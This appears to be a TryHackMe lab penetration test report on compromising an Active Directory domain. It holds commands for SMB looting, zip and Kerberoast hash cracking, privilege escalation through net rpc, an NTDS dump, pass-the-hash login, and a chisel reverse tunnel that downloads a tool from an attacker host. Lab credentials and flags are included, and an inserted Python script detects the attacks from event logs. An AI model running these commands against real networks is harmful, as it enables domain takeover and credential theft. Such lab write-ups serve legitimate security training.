Report

Uploaded by

Muhammad Zeeshan

Active Directory Penetration Test Summary

Target

• Domain Controller (DC): 10.200.150.10
• Workstation (WRK): 10.200.150.20 (WRK.TRYHACKME.LOC)
• Domain: TRYHACKME.LOC

1. Overview

The penetration test targeted the Active Directory infrastructure of TRYHACKME.LOC, focusing primarily
on the domain controller (10.200.150.10) and an associated workstation (10.200.150.20).
The assessment identified multiple weaknesses in authentication, access control, and network
configuration, which enabled initial access, privilege escalation, and full domain compromise. The test
demonstrated how an attacker could leverage weak credentials, Kerberos service vulnerabilities, and
misconfigured SMB shares to escalate privileges and extract sensitive domain data.

2. Scope

• User Enumeration and Credential Access: Identification and validation of domain users and
passwords.
• SMB Share Enumeration and File Access: Access to shared folders on WRK and DC, extraction
of credential archives.
• Kerberos Attacks (Kerberoasting): Enumeration and cracking of service account credentials.
• Privilege Escalation: Adding users to privileged groups via SMB RPC.
• Domain Credentials Dumping: Extraction of NTDS.dit hashes for domain users.
• Remote Access: Authentication and shell access via WinRM with compromised credentials.
• Network Tunneling: Setup of reverse proxy tunnels to enable persistent access.
• Flag Extraction: Retrieval of user and domain flags to demonstrate full system compromise.

3. Impact

• Initial foothold gained on workstation (10.200.150.20) by exploiting SMB shares containing
weakly protected credentials.
• Privilege escalation achieved on domain controller (10.200.150.10) through Kerberoasting
and group membership abuse.
• Full domain compromise via dumping and cracking domain hashes from NTDS.dit.
• Complete administrative control over Active Directory environment obtained.
• Sensitive data exposure including user credentials and critical domain information.
• Potential for persistent and stealthy access via network tunneling techniques.

This level of compromise allows attackers to control all domain resources, impersonate any user,
and maintain undetected access, posing a critical security risk.

4. Conclusion

The Active Directory environment of TRYHACKME.LOC is critically vulnerable due to weak credential
management, insufficient Kerberos protections, lax SMB share security, and lack of strict privilege
control. These flaws allowed seamless escalation from workstation access to full domain administrator
control. Immediate remediation is essential to mitigate these risks and secure the domain against
both internal and external threats.

Attack Walkthrough

Target: Workstation

• Machine IP: 10.200.150.20
• Domain: WRK.TRYHACKME.LOC

Step 1: Hostname Resolution Add domain to /etc/hosts to resolve the hostname locally:

# appending to /etc/hosts needs root; a plain >> redirection runs as the unprivileged shell
echo "10.200.150.20 WRK.TRYHACKME.LOC" | sudo tee -a /etc/hosts

Step 2: SMB Share Enumeration & File Download Use smbclient to connect to a shared folder
and list files:

# single quotes keep the backslashes from being eaten by the shell
smbclient '\\tryhackme.loc\safe'

When prompted for a password, press Enter (empty password), or try default credentials if known.

List files inside the share:

smb: \> ls

Download the credentials archive:

smb: \> get creds.zip
smb: \> exit

Step 3: Crack ZIP Password Use John the Ripper to crack the ZIP password:

# first convert the archive into a john-compatible hash (zip2john ships with John the Ripper)
zip2john creds.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Output reveals password: Passw0rd

Step 4: Extract ZIP File Extract the password-protected archive with 7zip:

7z x creds.zip

Enter password: Passw0rd

Check extracted file contents:

cat creds.txt

Credentials found:

• Username: John
• Password: VerySafePassword!

Step 5: Remote Login via WinRM Use nxc or evil-winrm to authenticate with extracted
credentials:

nxc winrm 10.200.150.20 -u "John" -p 'VerySafePassword!'
# or
evil-winrm -i 10.200.150.20 -u 'John' -p 'VerySafePassword!'

A successful login provides a PowerShell shell.

Step 6: Access User Flag Navigate to user’s desktop and read the flag:

cd C:\Users\john\Desktop
type user.txt

Flag:

THM{58b41573-062b-42ea-b312-dd5b7cc27671}

Target: Domain Controller - 10.200.150.10

Executive Summary The Domain Controller (DC) at IP 10.200.150.10 was assessed for Active
Directory and network security vulnerabilities. Multiple weaknesses were identified that allowed privilege
escalation from a low-privileged user (j.phillips) to full Domain Administrator access, enabling
complete domain compromise. Critical findings include weak Kerberos security (Kerberoasting),
improper group membership management, unrestricted access to sensitive data like NTDS.dit, and
unmonitored network tunnels.

1. User Enumeration & Initial Access

• Discovered user j.phillips exists in the domain.
• Credentials for j.phillips were cracked or obtained (password: Welcome1).
• Verified SMB login on DC with these credentials.

Command:

proxychains nxc smb 10.200.150.10 -u 'j.phillips' -p 'Welcome1'

Result: Successful SMB login.

2. Kerberos SPN Enumeration & TGS Ticket Request (Kerberoasting) Enumerated Service Principal
Names (SPNs) assigned to domain accounts to find accounts eligible for Kerberoasting.

Command:

proxychains impacket-GetUserSPNs tryhackme.loc/j.phillips:'Welcome1' -dc-ip 10.200.150.10

Found SPN: HTTP/csm.tryhackme.loc tied to user j.phillips.

Requested Kerberos TGS ticket hashes for offline cracking:

proxychains impacket-GetUserSPNs tryhackme.loc/j.phillips:'Welcome1' -dc-ip 10.200.150.10 -request

3. Cracking Kerberos TGS Hash Cracked extracted TGS hash offline with john using rockyou
wordlist.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Password cracked: Welcome1 (matches the user password).

4. Adding User to Domain Admins Group Used SMB RPC command to add j.phillips to the
Administrators group.

Command:

proxychains net rpc group addmem "Administrators" "j.phillips" -U "tryhackme.loc/j.phillips%Welcome1" -S 10.200.150.10

Added successfully with no restrictions.

5. NTDS.dit Dump to Obtain Domain Hashes Dumped domain credential hashes, including
high-privilege accounts like Administrator.

Command:

proxychains netexec smb 10.200.150.10 -u "j.phillips" -p 'Welcome1' --ntds

Result: Obtained NT hashes of domain users, critical for further lateral movement.
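The findings in sections 2 through 5 each leave a distinct trace in the domain controller's Security log: RC4-encrypted service ticket requests (Event ID 4769) for user-account SPNs, additions to privileged groups (Event IDs 4728/4732), and a non-DC account exercising directory replication rights on the domain object (Event ID 4662), which is how a replication-based NTDS dump pulls hashes. The script below is an added example, not part of the original report, showing how a defender would check for all three and correlate them back to a single account. Event field names follow the Windows Security log schema; the one-line-per-event text format and every sample event in SAMPLE_LOG are constructed for this example.

```python
"""Detections for the domain-controller findings above (added example, not part
of the original report). Event field names follow the Windows Security log
schema for Event IDs 4769, 4728/4732 and 4662; the one-line-per-event text
format and every sample event below are constructed for this example."""
from datetime import datetime

# Extended rights a replication-based NTDS dump exercises on the domain object:
# DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}
RC4_HMAC = "0x17"  # TicketEncryptionType of an RC4 service ticket

# Constructed sample events: EventID|timestamp|key=value;key=value;...
SAMPLE_LOG = """\
4769|2024-05-01T09:00:01|TargetUserName=j.phillips@TRYHACKME.LOC;ServiceName=krbtgt;TicketEncryptionType=0x12
4769|2024-05-01T09:02:13|TargetUserName=j.phillips@TRYHACKME.LOC;ServiceName=j.phillips;TicketEncryptionType=0x17
4769|2024-05-01T09:02:14|TargetUserName=WRK$@TRYHACKME.LOC;ServiceName=DC$;TicketEncryptionType=0x12
4728|2024-05-01T09:10:40|SubjectUserName=j.phillips;MemberName=CN=Sam,CN=Users,DC=tryhackme,DC=loc;TargetUserName=Marketing
4732|2024-05-01T09:11:05|SubjectUserName=j.phillips;MemberName=CN=j.phillips,CN=Users,DC=tryhackme,DC=loc;TargetUserName=Administrators
4662|2024-05-01T09:15:00|SubjectUserName=DC$;ObjectType=domainDNS;Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
4662|2024-05-01T09:20:30|SubjectUserName=j.phillips;ObjectType=domainDNS;Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
"""


def parse_events(text):
    """Turn the constructed line format into dicts with an int event_id and a datetime."""
    events = []
    for line in text.strip().splitlines():
        event_id, ts, fields = line.split("|", 2)
        ev = {"event_id": int(event_id), "time": datetime.fromisoformat(ts)}
        for kv in fields.split(";"):
            key, _, value = kv.partition("=")  # DNs contain '=', so split on the first one only
            ev[key] = value
        events.append(ev)
    return events


def is_machine_account(name):
    """Computer accounts end in '$'; they request tickets and replicate legitimately."""
    return name.split("@")[0].endswith("$")


def detect_kerberoasting(events):
    """4769 with an RC4 ticket for a user-account SPN (not krbtgt, not a machine account)."""
    hits = []
    for ev in events:
        if ev["event_id"] != 4769:
            continue
        svc = ev.get("ServiceName", "")
        if (ev.get("TicketEncryptionType") == RC4_HMAC
                and svc.lower() != "krbtgt" and not is_machine_account(svc)):
            hits.append((ev["TargetUserName"], svc))
    return hits


def detect_privileged_group_change(events):
    """4728 (global group) / 4732 (local group) where the group is a privileged one."""
    return [(ev["SubjectUserName"], ev["MemberName"], ev["TargetUserName"])
            for ev in events
            if ev["event_id"] in (4728, 4732) and ev.get("TargetUserName") in PRIVILEGED_GROUPS]


def detect_dcsync(events):
    """4662 where a non-machine account exercises replication rights on the domain object."""
    hits = []
    for ev in events:
        if ev["event_id"] != 4662:
            continue
        props = set(ev.get("Properties", "").split(","))
        if props & REPLICATION_GUIDS and not is_machine_account(ev["SubjectUserName"]):
            hits.append((ev["SubjectUserName"], ev["time"]))
    return hits


def run_all(text=SAMPLE_LOG):
    events = parse_events(text)
    return {
        "kerberoasting": detect_kerberoasting(events),
        "privileged_group_change": detect_privileged_group_change(events),
        "dcsync": detect_dcsync(events),
    }


def correlate(results):
    """Accounts that trip more than one rule: the chain above was driven by a single account."""
    seen = {}
    for rule, hits in results.items():
        for hit in hits:
            acct = hit[0].split("@")[0].lower()
            seen.setdefault(acct, set()).add(rule)
    return {acct: sorted(rules) for acct, rules in seen.items() if len(rules) > 1}


if __name__ == "__main__":
    results = run_all()
    for rule, hits in results.items():
        print(f"{rule}: {hits}")
    print("correlated:", correlate(results))
```

The benign events in the sample (a krbtgt TGS request, an AES ticket for a machine account, a change to a non-privileged group, and replication by the DC's own computer account) are there to show that each rule is keyed on the specific condition rather than on the event ID alone; in a real deployment the events would come from the DC's Security log via your SIEM, and the 4662 rule additionally requires an audit policy that logs Directory Service Access on the domain object.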

6. Access Domain Administrator Account Used the dumped Administrator hash to log in via
Evil-WinRM.

Command:

proxychains evil-winrm -i 10.200.150.10 -u Administrator -H <Administrator NT hash>

Successful login to DC as Administrator.

7. Final Flag Location & Extraction Upon Administrator login, navigated to root directory:

cd C:\
dir
type flag.txt

Flag Content:

THM{6ce25b12-0c89-41ba-a165-452cac91253c}

8. Reverse Proxy Setup (Chisel) Established reverse SOCKS proxy using chisel to tunnel traffic and
enable SMB/RPC relay.

Local (Kali) Server:

sudo ./chisel server --reverse --port 9999

Remote (Windows DC) Client:

# in PowerShell, wget is an alias of Invoke-WebRequest, so the output file is given with -OutFile
wget http://<kali_ip>:8000/chisel_1.10.1_windows_amd64.exe -OutFile chisel.exe
# R:socks opens a reverse SOCKS listener on the Kali side (port 1080 by default) for proxychains to use
.\chisel.exe client <kali_ip>:9999 R:socks

Configured proxychains on Kali to route traffic through chisel.
